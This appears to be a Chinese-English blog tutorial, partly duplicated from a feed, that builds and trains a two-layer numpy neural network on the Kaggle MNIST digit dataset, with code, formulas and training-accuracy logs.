    Iteration: 0[2 2 9 ... 9 2 2] [6 1 2 ... 5 3 1]Accuray: 0.13534146341463416Iteration: 10[2 6 9 ... 3 6 2] [6 1 2 ... 5 3 1]Accuray: 0.2577560975609756Iteration: 20[2 6 9 ... 3 1 2] [6 1 2 ... 5 3 1]Accuray: 0.3676341463414634Iteration: 30[2 6 9 ... 3 1 1] [6 1 2 ... 5 3 1]Accuray: 0.4432439024390244Iteration: 40[2 1 9 ... 3 1 1] [6 1 2 ... 5 3 1]Accuray: 0.495390243902439Iteration: 50[2 1 8 ... 3 9 1] [6 1 2 ... 5 3 1]Accuray: 0.5352682926829269Iteration: 60[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.568390243902439Iteration: 70[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.5975609756097561Iteration: 80[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6207317073170732Iteration: 90[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6396829268292683Iteration: 100[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6570243902439025Iteration: 110[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.672829268292683Iteration: 120[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6867560975609757Iteration: 130[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6998048780487804Iteration: 140[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.710390243902439Iteration: 150[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7207560975609756Iteration: 160[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7307560975609756Iteration: 170[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7396829268292683Iteration: 180[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7484634146341463Iteration: 190[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7559512195121951Iteration: 200[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7630975609756098Iteration: 210[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7700731707317073Iteration: 220[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7764878048780488Iteration: 230[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7819024390243903Iteration: 240[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7870731707317074Iteration: 250[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7922926829268293Iteration: 260[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7969512195121952Iteration: 270[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8013414634146342Iteration: 280[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.805439024390244Iteration: 290[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8083414634146342Iteration: 300[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8113658536585366Iteration: 310[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8147560975609756Iteration: 320[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.818Iteration: 330[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8207073170731707Iteration: 340[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8234634146341463Iteration: 350[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8260975609756097Iteration: 360[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8283170731707317Iteration: 370[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8308292682926829Iteration: 380[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8332682926829268Iteration: 390[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8349512195121951Iteration: 400[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8371463414634146Iteration: 410[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8391463414634146Iteration: 420[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8407073170731707Iteration: 430[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8424146341463414Iteration: 440[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8438780487804878Iteration: 450[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.845390243902439Iteration: 460[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8467317073170731Iteration: 470[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8479756097560975Iteration: 480[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.848780487804878Iteration: 490[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8501219512195122

    最后得到 85.01% 的准确率。

    训练结果可视化

    将训练好的模型做出预测

    def make_predictions(X, W1, b1, W2, b2):
    _, _, _, A2 = forward_prop(W1, b1, W2, b2, X)
    predictions = get_predictions(A2)
    return predictions
    def test_prediction(index, W1, b1, W2, b2):
    current_image = X_train[:, index, None]
    prediction = make_predictions(X_train[:, index, None], W1, b1, W2, b2)
    label = Y_train[index]
    print("Prediction: ", prediction)
    print("Label: ", label)

    current_image = current_image.reshape((28, 28)) * 255
    plt.gray() # matplotlib 库的 pyplot 模块中的 gray() 函数用于将颜色映射设置为“gray”。
    plt.imshow(current_image, interpolation='nearest')
    plt.show()

    Let’s look at a couple of examples:

    test_prediction(0, W1, b1, W2, b2)
    test_prediction(1, W1, b1, W2, b2)
    test_prediction(2, W1, b1, W2, b2)
    test_prediction(3, W1, b1, W2, b2)
    Prediction:  [1]Label:  1

    png

    Prediction:  [1]Label:  1

    png

    Prediction:  [6]Label:  6

    png

    Prediction:  [1]Label:  1

    png

    将训练结果用于验证集

    dev_predictions = make_predictions(X_dev, W1, b1, W2, b2)
    get_accuracy(dev_predictions, Y_dev)
    [6 3 3 4 3 5 9 2 2 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 0 6 8 4 6 4 1 1 0 8 3 1 8 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 6 9 6 4 4 4 4 0 0 7 1 6 6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 9 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 5 8 6 2 3 2 5 0 6 7 5 4 1 2 9 3 2 6 6 9 5 6 2 1 2 7 3 4 3 2 6 5 2 5 2 6 1 8 1 7 4 8 4 1 2 2 0 1 8 1 5 2 6 8 5 7 8 1 0 0 0 9 2 7 5 6 5 6 9 7 4 9 4 6 7 7 3 7 4 2 1 0 7 7 5 8 9 0 3 6 5 8 6 8 1 3 7 5 5 7 9 1 9 8 1 6 0 3 0 8 9 1 1 7 9 4 1 9 3 3 1 6 0 2 8 2 4 6 8 1 0 9 6 3 3 2 6 1 4 0 8 2 7 0 2 2 1 2 7 3 1 1 2 2 8 9 5 1 3 9 7 2 4 4 4 3 7 3 8 2 7 8 1 5 9 7 5 5 1 3 1 9 4 7 7 9 4 1 4 7 9 2 9 3 1 2 7 7 0 3 3 8 7 5 6 7 9 4 7 3 3 9 2 3 2 8 9 2 3 6 0 5 4 3 2 7 0 4 2 5 4 8 9 9 2 2 7 8 4 1 6 3 2 9 6 2 4 3 7 3 6 6 4 5 1 2 0 9 1 5 5 6 9 5 8 5 6 8 9 0 9 8 6 0 7 8 0 5 0 3 2 3 3 9 4 1 4 6 6 9 6 1 3 3 3 0 6 5 8 0 1 6 5 6 1 8 9 8 0 2 1 3 3 9 9 6 2 9 8 2 3 6 5 6 9 7 0 7 4 8 3 4 9 9 4 3 2 0 2 4 5 8 9 9 5 0 7 3 0 4 9 1 2 1 7 7 6 2 2 0 6 1 9 8 8 0 0 1 9 3 9 8 4 8 8 1 4 2 0 1 3 5 1 8 8 3 9 7 1 1 2 6 2 6 1 7 1 2 5 8 0 3 0 9 5 8 9 0 0 8 1 9 3 1 4 4 4 9 7 2 8 1 5 5 8 5 4 4 1 8 5 6 1 1 9 2 8 3 7 5 7 4 9 4 3 6 7 9 0 8 0 1 7 2 8 7 1 3 8 4 4 1 1 9 7 1 8 4 4 0 3 3 2 6 8 8 7 7 7 5 3 0 4 5 5 7 2 3 0 1 7 1 2 8 0 8 0 6 6 6 6 6 4 5 5 8 0 1 3 5 7 7 4 8 6 9 1 2 4 4 4 6 5 0 2 3 1 3 8 1 4 4 7 9 9 9 6 0 5 9 9 6 9 6 4 3 1 1 0 0 5 9 6 4 1 0 1 7 9 9 1 1 1 4 4 3 8 2 1 0 8 5 0 9 0 2 8 5 2 0 3 7 6 3 0 4 3 9 2 5 2 3 2 4 4 6 7 1 6 7 1 7 0 3 7 3 6 2 8 2 1 6 4 1 5 8 6 8 7 5 1 6 8 3 1 8 2 9 1 8 6 7 0 4 2 6 8 9 7 2 8 6 4 2 6 3 8 5 1 8 3 3 0 1 4 1 0 9 1 7 3 6 0 4 2 1 7 1 0 0 0 2 0 9 7 9 8 4 3 6 6 9 0 5 8 5 0 6 3 1 9 2 5 2 7 4 8 6 7 7 9 3 9 4 3 6 3 5 2 1 4 5 5 9 6 5 1 8 5 2 2 2 0 5 8 6 2 7 7 5 2 4 0 2 6 4 2 4 7 9 8 3 6 0 2 8 9 4 6 6 8 7 2 2 7 2 0 2 9 5 2 1 3 7 6 2 0 7 4 7 6 0 6 6 0 1 5 1 2 9 3 9 8 2 9 6 5 4 9 3 7 8 1 8 4 7 7 0 2 3 5 5 7 5 3 4 9 0 8 2 4 3 0 9 7 0 2 3 7 5 2 0 2 7 5 9 6 8 9 1 2 7 6 0 1 4 6 4 3 8 4 2 6 1 0 4 7 3 0 7 2 5 5 1 8 6 4 6 1 0 6 6 1 8 1 3 9 9 8 0 4 4 4 7 0 1 0 9 0 5 4 1 5 4 4 7 0 4 7 1] [6 3 3 4 3 5 9 2 9 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 2 6 8 2 6 4 1 1 0 8 3 1 2 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 0 9 6 4 4 4 4 0 0 7 1 6 6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 4 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 0 8 6 4 3 3 5 0 6 7 5 4 1 2 4 3 2 6 6 9 5 6 2 1 2 7 3 8 9 2 6 5 2 5 2 6 1 9 1 7 4 8 4 1 5 2 0 1 8 1 3 2 5 8 5 7 5 1 0 0 0 9 2 7 5 6 9 6 7 7 4 9 4 6 7 7 3 7 4 2 1 0 7 7 5 5 9 0 3 6 5 3 6 8 1 3 9 5 5 7 4 1 4 5 8 6 0 3 0 5 9 1 7 9 3 4 7 9 3 3 1 6 0 2 5 2 4 0 8 1 2 9 6 3 8 2 6 1 9 0 8 3 7 0 8 2 1 2 7 3 1 1 2 2 8 7 5 1 3 9 7 3 4 4 4 3 7 8 8 7 7 3 1 5 9 7 5 5 1 3 1 9 4 7 2 9 4 1 4 7 9 2 9 3 1 2 7 7 0 9 8 8 7 5 6 7 5 4 7 3 3 9 2 3 2 8 9 2 3 6 0 5 4 3 2 7 0 4 2 5 4 8 9 9 2 2 7 4 4 1 6 3 6 4 6 2 4 8 7 3 6 6 2 5 1 2 0 4 3 3 5 6 9 5 8 5 6 8 9 8 9 8 6 5 7 9 0 5 0 8 2 3 9 4 4 1 4 6 6 9 6 1 3 3 3 0 6 5 3 0 1 4 5 6 1 7 9 8 6 2 1 3 3 9 9 8 7 9 8 4 3 6 5 6 9 7 0 3 9 8 3 4 9 9 4 3 2 0 3 4 5 8 9 9 0 0 7 5 0 4 8 1 2 1 7 7 6 2 2 0 6 1 9 5 5 0 4 8 4 5 9 2 4 8 8 5 4 2 0 1 1 5 1 8 8 3 9 7 1 1 8 6 2 6 1 9 1 3 5 8 6 3 0 9 5 2 9 0 0 8 1 9 3 1 4 4 6 9 7 2 8 1 5 5 8 5 4 4 2 1 5 6 1 1 9 2 8 3 7 5 6 4 9 4 3 6 7 9 0 8 0 1 7 2 8 9 1 3 8 4 4 1 1 9 7 1 8 4 4 0 3 3 2 6 8 8 7 7 7 5 3 0 4 7 5 7 2 3 0 1 7 1 2 8 0 8 0 6 2 6 5 6 4 5 5 8 0 1 5 5 7 7 4 8 6 9 1 2 4 4 4 6 5 0 6 5 1 3 8 1 4 4 7 8 9 9 6 0 5 9 9 6 9 8 4 9 1 1 0 0 5 9 6 4 1 7 1 7 7 9 1 1 1 4 5 3 8 4 1 0 8 5 0 9 0 6 8 8 2 0 3 7 6 3 0 4 3 9 3 5 7 3 3 4 4 6 7 1 6 7 1 7 0 3 7 3 6 1 2 2 1 6 4 1 5 8 5 8 7 5 5 6 8 3 1 8 6 8 1 8 6 7 0 4 2 6 8 7 7 2 8 6 4 3 6 3 8 5 1 8 3 3 0 1 4 1 0 7 1 7 3 6 0 4 3 1 7 1 0 0 0 2 0 9 7 4 8 4 3 8 6 4 0 5 8 5 0 6 3 1 9 2 5 9 7 4 5 6 7 2 9 3 9 4 3 6 6 5 9 1 4 5 5 9 2 5 1 8 5 2 2 2 0 3 5 6 2 7 7 5 7 9 0 2 6 8 8 4 7 9 8 5 6 0 6 8 7 4 8 6 9 7 2 2 7 2 0 2 9 5 1 1 3 4 6 2 0 7 4 7 6 0 6 6 0 1 5 1 2 9 3 9 9 2 9 6 5 4 4 7 7 8 1 8 4 7 7 0 8 3 5 5 7 3 3 4 9 0 8 2 4 3 0 9 7 0 2 3 7 5 2 0 2 7 5 9 6 8 9 1 2 8 6 0 1 4 2 4 3 8 4 2 6 1 0 4 7 3 0 3 2 5 0 1 8 6 4 6 1 0 6 6 1 8 1 5 9 9 8 2 4 4 4 7 0 1 0 9 0 5 4 1 5 4 4 7 0 4 7 8]0.845

    Still 84% accuracy, so our model generalized from the training data pretty well.

    ]]>
    + 前言

    教你怎么只用 numpy 和数学方法构建一个神经网络,而不是使用 Tensorflow 或 Pytorch。

    相关资源

    内容

    导入相关库

    1
    2
    3
    import numpy as np
    import pandas as pd
    from matplotlib import pyplot as plt

    读取数据集

    1
    data = pd.read_csv('kaggle/input/digit-recognizer/train.csv')
    1
    data.shape
    (42000, 785)

    数组形状:$(42000, 785)$, 说明:

    • $42000$ 行, 表示这个数据集有 $42000$ 张图片

    • $785$ 列, 表示数据集中每张图片大小为 $28 \times 28$, 外带 $1$ 个标签, $28 \times 28 + 1 = 785$

    将数据集分为训练集和测试集

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    data = np.array(data)  # 将数据集从 pd.DataFrame 转为 np.array
    m, n = data.shape
    np.random.shuffle(data) # shuffle 直接在原来的数组上进行操作,改变原来数组的顺序,无返回值

    # 验证集
    data_dev = data[0:1000].T # 前 1000 个
    Y_dev = data_dev[0]
    X_dev = data_dev[1:n]
    X_dev = X_dev / 255. # 将图像各像素点的灰度值映射到 0 到 1 之间的浮点数,使之后的 exp 运算不会溢出

    # 训练集
    data_train = data[1000:m].T
    Y_train = data_train[0]
    X_train = data_train[1:n]
    X_train = X_train / 255.
    _,m_train = X_train.shape

    定义相关函数

    ​ Our NN will have a simple two-layer architecture. Input layer $a^{[0]}$ will have $784$ units corresponding to the $784$ pixels in each $28\times 28$ input image. A hidden layer $a^{[1]}$ will have $10$ units with ReLU activation, and finally our output layer $a^{[2]}$ will have $10$ units corresponding to the ten digit classes with softmax activation.

    ​ 我们的神经网络将有一个简单的两层结构。输入层 $a^{[0]}$ 将有 $784$ 个单元,对应于每个 $28\times 28$ 输入图像中的 $784$ 个像素。隐藏层 $a^{[1]}$ 将有 $10$ 个单元,用 ReLU 激活,最后我们的输出层 $a^{[2]}$ 将有 $10$ 个单元,对应于用 softmax 激活的 $10$ 个数字类别。

    Vars and shapes

    png

    Forward prop

    • $A^{[0]} = X$: 784 x m
    • $Z^{[1]} \sim A^{[1]}$: 10 x m
    • $W^{[1]}$: 10 x 784 (as $W^{[1]} A^{[0]} \sim Z^{[1]}$)
    • $B^{[1]}$: 10 x 1
    • $Z^{[2]} \sim A^{[2]}$: 10 x m
    • $W^{[1]}$: 10 x 10 (as $W^{[2]} A^{[1]} \sim Z^{[2]}$)
    • $B^{[2]}$: 10 x 1

    Backprop

    • $dZ^{[2]}$: 10 x m ($~A^{[2]}$)
    • $dW^{[2]}$: 10 x 10
    • $dB^{[2]}$: 10 x 1
    • $dZ^{[1]}$: 10 x m ($~A^{[1]}$)
    • $dW^{[1]}$: 10 x 10
    • $dB^{[1]}$: 10 x 1

    初始化参数

    使初始参数随机在 [-0.5, 0.5) 之间

    通过 np.random.rand() 可以返回一个或一组服从“0 ~ 1”均匀分布的随机样本值。随机样本取值范围是 [0, 1),不包括 1。

    1
    2
    3
    4
    5
    6
    def init_params():
    W1 = np.random.rand(10, 784) - 0.5
    b1 = np.random.rand(10, 1) - 0.5
    W2 = np.random.rand(10, 10) - 0.5
    b2 = np.random.rand(10, 1) - 0.5
    return W1, b1, W2, b2

    激活函数: ReLU

    1
    2
    def ReLU(Z):
    return np.maximum(Z, 0)

    Softmax

    Softmax 函数将各个输出节点的输出值范围映射到 [0, 1],并且约束各个输出节点的输出值的和为 1。

    $Softmax(z_i)=\frac{ez_i}{\sumC_{C=1}e^{z_C}}$,其中 $z_i$ 为第 $i$ 个节点的输出值,$C$ 为输出结点的个数,即分类的类别个数。通过 Softmax 函数就可以将多分类的输出值转换为范围在 [0, 1] 和为 1 的概率分布。

    png

    1
    2
    3
    def softmax(Z):
    A = np.exp(Z) / sum(np.exp(Z))
    return A

    前向传播

    $$Z^{[1]} = W^{[1]} X + b^{[1]}$$
    $$A^{[1]} = g_{\text{ReLU}}(Z^{[1]}))$$
    $$Z^{[2]} = W^{[2]} A^{[1]} + b^{[2]}$$
    $$A^{[2]} = g_{\text{softmax}}(Z^{[2]})$$

    1
    2
    3
    4
    5
    6
    def forward_prop(W1, b1, W2, b2, X):
    Z1 = W1.dot(X) + b1
    A1 = ReLU(Z1)
    Z2 = W2.dot(A1) + b2
    A2 = softmax(Z2)
    return Z1, A1, Z2, A2

    ReLU 函数的导数,用于梯度下降

    1
    2
    def ReLU_deriv(Z):
    return Z > 0

    独热编码

    将标签 Y 转为独热编码:

    1
    2
    3
    4
    5
    def one_hot(Y):
    one_hot_Y = np.zeros((Y.size, Y.max() + 1))
    one_hot_Y[np.arange(Y.size), Y] = 1
    one_hot_Y = one_hot_Y.T
    return one_hot_Y

    反向传播

    $$dZ^{[2]} = A^{[2]} - Y$$
    $$dW^{[2]} = \frac{1}{m} dZ^{[2]} A^{[1]T}$$
    $$dB^{[2]} = \frac{1}{m} \Sigma {dZ^{[2]}}$$
    $$dZ^{[1]} = W^{[2]T} dZ^{[2]} .* g^{[1]\prime} (z^{[1]})$$
    $$dW^{[1]} = \frac{1}{m} dZ^{[1]} A^{[0]T}$$
    $$dB^{[1]} = \frac{1}{m} \Sigma {dZ^{[1]}}$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y):
    one_hot_Y = one_hot(Y)
    dZ2 = A2 - one_hot_Y
    dW2 = 1 / m * dZ2.dot(A1.T)
    db2 = 1 / m * np.sum(dZ2)
    dZ1 = W2.T.dot(dZ2) * ReLU_deriv(Z1)
    dW1 = 1 / m * dZ1.dot(X.T)
    db1 = 1 / m * np.sum(dZ1)
    return dW1, db1, dW2, db2

    调整参数

    根据学习率 alpha 调整参数:

    $$W^{[2]} := W^{[2]} - \alpha dW^{[2]}$$
    $$b^{[2]} := b^{[2]} - \alpha db^{[2]}$$
    $$W^{[1]} := W^{[1]} - \alpha dW^{[1]}$$
    $$b^{[1]} := b^{[1]} - \alpha db^{[1]}$$

    1
    2
    3
    4
    5
    6
    def update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha):
    W1 = W1 - alpha * dW1
    b1 = b1 - alpha * db1
    W2 = W2 - alpha * dW2
    b2 = b2 - alpha * db2
    return W1, b1, W2, b2

    预测结果

    numpy.argmax() 函数返回特定轴上数组的最大元素的索引,选取可能性最大的分类结果作为最终的分类结果。

    1
    2
    def get_predictions(A2):
    return np.argmax(A2, 0)

    计算准确率

    1
    2
    3
    def get_accuracy(predictions, Y):
    print(predictions, Y)
    return np.sum(predictions == Y) / Y.size # 准确率 = 正确数 / 总数

    梯度下降

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    def gradient_descent(X, Y, alpha, iterations):
    W1, b1, W2, b2 = init_params() # 初始化参数
    for i in range(iterations):
    Z1, A1, Z2, A2 = forward_prop(W1, b1, W2, b2, X) # 前向传播
    dW1, db1, dW2, db2 = backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y) # 反向传播
    W1, b1, W2, b2 = update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha) # 调参
    if i % 10 == 0: # 每训练 10 个 epoch 就显示一次准确率
    print("Iteration:", i)
    predictions = get_predictions(A2)
    print("Accuray:", get_accuracy(predictions, Y))
    return W1, b1, W2, b2

    训练神经网络

    最后得到的准确率以及神经网络的各个参数:

    1
    W1, b1, W2, b2 = gradient_descent(X_train, Y_train, 0.10, 500)
    Iteration: 0[2 2 9 ... 9 2 2] [6 1 2 ... 5 3 1]Accuray: 0.13534146341463416Iteration: 10[2 6 9 ... 3 6 2] [6 1 2 ... 5 3 1]Accuray: 0.2577560975609756Iteration: 20[2 6 9 ... 3 1 2] [6 1 2 ... 5 3 1]Accuray: 0.3676341463414634Iteration: 30[2 6 9 ... 3 1 1] [6 1 2 ... 5 3 1]Accuray: 0.4432439024390244Iteration: 40[2 1 9 ... 3 1 1] [6 1 2 ... 5 3 1]Accuray: 0.495390243902439Iteration: 50[2 1 8 ... 3 9 1] [6 1 2 ... 5 3 1]Accuray: 0.5352682926829269Iteration: 60[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.568390243902439Iteration: 70[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.5975609756097561Iteration: 80[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6207317073170732Iteration: 90[2 1 8 ... 9 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6396829268292683Iteration: 100[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6570243902439025Iteration: 110[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.672829268292683Iteration: 120[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6867560975609757Iteration: 130[2 1 8 ... 5 9 1] [6 1 2 ... 5 3 1]Accuray: 0.6998048780487804Iteration: 140[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.710390243902439Iteration: 150[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7207560975609756Iteration: 160[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7307560975609756Iteration: 170[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7396829268292683Iteration: 180[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7484634146341463Iteration: 190[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7559512195121951Iteration: 200[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7630975609756098Iteration: 210[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7700731707317073Iteration: 220[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7764878048780488Iteration: 230[2 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7819024390243903Iteration: 240[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7870731707317074Iteration: 250[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7922926829268293Iteration: 260[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.7969512195121952Iteration: 270[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8013414634146342Iteration: 280[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.805439024390244Iteration: 290[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8083414634146342Iteration: 300[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8113658536585366Iteration: 310[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8147560975609756Iteration: 320[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.818Iteration: 330[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8207073170731707Iteration: 340[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8234634146341463Iteration: 350[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8260975609756097Iteration: 360[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8283170731707317Iteration: 370[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8308292682926829Iteration: 380[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8332682926829268Iteration: 390[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8349512195121951Iteration: 400[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8371463414634146Iteration: 410[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8391463414634146Iteration: 420[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8407073170731707Iteration: 430[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8424146341463414Iteration: 440[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8438780487804878Iteration: 450[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.845390243902439Iteration: 460[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8467317073170731Iteration: 470[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8479756097560975Iteration: 480[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.848780487804878Iteration: 490[4 1 8 ... 5 3 1] [6 1 2 ... 5 3 1]Accuray: 0.8501219512195122

    最后得到 85.01% 的准确率。

    训练结果可视化

    将训练好的模型做出预测

    1
    2
    3
    4
    def make_predictions(X, W1, b1, W2, b2):
    _, _, _, A2 = forward_prop(W1, b1, W2, b2, X)
    predictions = get_predictions(A2)
    return predictions
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    def test_prediction(index, W1, b1, W2, b2):
    current_image = X_train[:, index, None]
    prediction = make_predictions(X_train[:, index, None], W1, b1, W2, b2)
    label = Y_train[index]
    print("Prediction: ", prediction)
    print("Label: ", label)

    current_image = current_image.reshape((28, 28)) * 255
    plt.gray() # matplotlib 库的 pyplot 模块中的 gray() 函数用于将颜色映射设置为“gray”。
    plt.imshow(current_image, interpolation='nearest')
    plt.show()

    Let’s look at a couple of examples:

    1
    2
    3
    4
    test_prediction(0, W1, b1, W2, b2)
    test_prediction(1, W1, b1, W2, b2)
    test_prediction(2, W1, b1, W2, b2)
    test_prediction(3, W1, b1, W2, b2)
    Prediction:  [1]Label:  1

    png

    Prediction:  [1]Label:  1

    png

    Prediction:  [6]Label:  6

    png

    Prediction:  [1]Label:  1

    png

    将训练结果用于验证集

    1
    2
    dev_predictions = make_predictions(X_dev, W1, b1, W2, b2)
    get_accuracy(dev_predictions, Y_dev)
    [6 3 3 4 3 5 9 2 2 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 0 6 8 4 6 4 1 1 0 8 3 1 8 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 6 9 6 4 4 4 4 0 0 7 1 6 6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 9 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 5 8 6 2 3 2 5 0 6 7 5 4 1 2 9 3 2 6 6 9 5 6 2 1 2 7 3 4 3 2 6 5 2 5 2 6 1 8 1 7 4 8 4 1 2 2 0 1 8 1 5 2 6 8 5 7 8 1 0 0 0 9 2 7 5 6 5 6 9 7 4 9 4 6 7 7 3 7 4 2 1 0 7 7 5 8 9 0 3 6 5 8 6 8 1 3 7 5 5 7 9 1 9 8 1 6 0 3 0 8 9 1 1 7 9 4 1 9 3 3 1 6 0 2 8 2 4 6 8 1 0 9 6 3 3 2 6 1 4 0 8 2 7 0 2 2 1 2 7 3 1 1 2 2 8 9 5 1 3 9 7 2 4 4 4 3 7 3 8 2 7 8 1 5 9 7 5 5 1 3 1 9 4 7 7 9 4 1 4 7 9 2 9 3 1 2 7 7 0 3 3 8 7 5 6 7 9 4 7 3 3 9 2 3 2 8 9 2 3 6 0 5 4 3 2 7 0 4 2 5 4 8 9 9 2 2 7 8 4 1 6 3 2 9 6 2 4 3 7 3 6 6 4 5 1 2 0 9 1 5 5 6 9 5 8 5 6 8 9 0 9 8 6 0 7 8 